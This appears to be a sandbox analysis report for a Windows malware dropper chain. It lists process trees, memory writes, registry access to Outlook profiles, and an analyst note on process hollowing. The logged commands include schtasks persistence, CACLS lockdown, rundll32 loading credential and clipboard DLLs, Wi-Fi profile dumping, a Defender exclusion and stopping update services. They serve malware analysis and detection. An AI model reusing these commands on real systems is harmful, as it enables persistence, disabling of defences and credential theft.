PID 3092 wrote to memory of 3808 (3 identical rows) N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\4B3.exe
PID 5112 wrote to memory of 752 (3 identical rows) N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe
PID 3092 wrote to memory of 4184 (3 identical rows) N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\793.exe
PID 3808 wrote to memory of 2308 (3 identical rows) N/A C:\Users\Admin\AppData\Local\Temp\4B3.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3392 wrote to memory of 4020 (2 identical rows) N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4020 wrote to memory of 5108 (2 identical rows) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Each parent-to-child pair is listed once with the number of identical rows in the original table. Two or three writes per pair is what ordinary process creation looks like in these reports. The six writes from the sample into AppLaunch.exe, taken together with the SetThreadContext and MapViewOfSection hits above, are consistent with hollowing a .NET framework host and running the payload inside it. PID 4020 appears first as the sample itself and later as msedge.exe started by cmd.exe: the sample had exited by then and Windows reused its PID, so correlate on PID plus image or start time, never on PID alone.
PID 2308 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 2308 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 2308 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 2308 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 2308 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 2308 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4.exe

"C:\Users\Admin\AppData\Local\Temp\3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\FFEB.exe

C:\Users\Admin\AppData\Local\Temp\FFEB.exe

C:\Users\Admin\AppData\Local\Temp\98.exe

C:\Users\Admin\AppData\Local\Temp\98.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1D2.bat" "

C:\Users\Admin\AppData\Local\Temp\28E.exe

C:\Users\Admin\AppData\Local\Temp\28E.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe

C:\Users\Admin\AppData\Local\Temp\36A.exe

C:\Users\Admin\AppData\Local\Temp\36A.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe

C:\Users\Admin\AppData\Local\Temp\4B3.exe

C:\Users\Admin\AppData\Local\Temp\4B3.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe

C:\Users\Admin\AppData\Local\Temp\793.exe

C:\Users\Admin\AppData\Local\Temp\793.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb153246f8,0x7ffb15324708,0x7ffb15324718

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4184 -ip 4184

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2RN726JK.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2RN726JK.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 788

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 968 -ip 968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 968 -s 540

C:\Users\Admin\AppData\Local\Temp\2240.exe

C:\Users\Admin\AppData\Local\Temp\2240.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb153246f8,0x7ffb15324708,0x7ffb15324718

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\255E.exe

C:\Users\Admin\AppData\Local\Temp\255E.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2264 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb153246f8,0x7ffb15324708,0x7ffb15324718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\4385.exe

C:\Users\Admin\AppData\Local\Temp\4385.exe

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\4F8C.exe

C:\Users\Admin\AppData\Local\Temp\4F8C.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb153246f8,0x7ffb15324708,0x7ffb15324718

C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp" /SL5="$D0042,2998240,68096,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\58B5.exe

C:\Users\Admin\AppData\Local\Temp\58B5.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1

C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe

"C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "LAC1031-1"

C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe

"C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe" -s

C:\Users\Admin\AppData\Local\Temp\6180.exe

C:\Users\Admin\AppData\Local\Temp\6180.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6092 -ip 6092

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb153246f8,0x7ffb15324708,0x7ffb15324718

C:\Users\Admin\AppData\Local\Temp\6AA9.exe

C:\Users\Admin\AppData\Local\Temp\6AA9.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

"C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb153246f8,0x7ffb15324708,0x7ffb15324718

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "Admin:N"&&CACLS "..\ea7c8244c8" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5560 -ip 5560

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "Utsysc.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb153246f8,0x7ffb15324708,0x7ffb15324718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xa4,0x108,0x7ffb153246f8,0x7ffb15324708,0x7ffb15324718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "Utsysc.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\clip64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\cacls.exe

CACLS "..\ea7c8244c8" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\ea7c8244c8" /P "Admin:R" /E

C:\Windows\system32\tar.exe

tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\811856890180_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6684 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x53c 0x540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

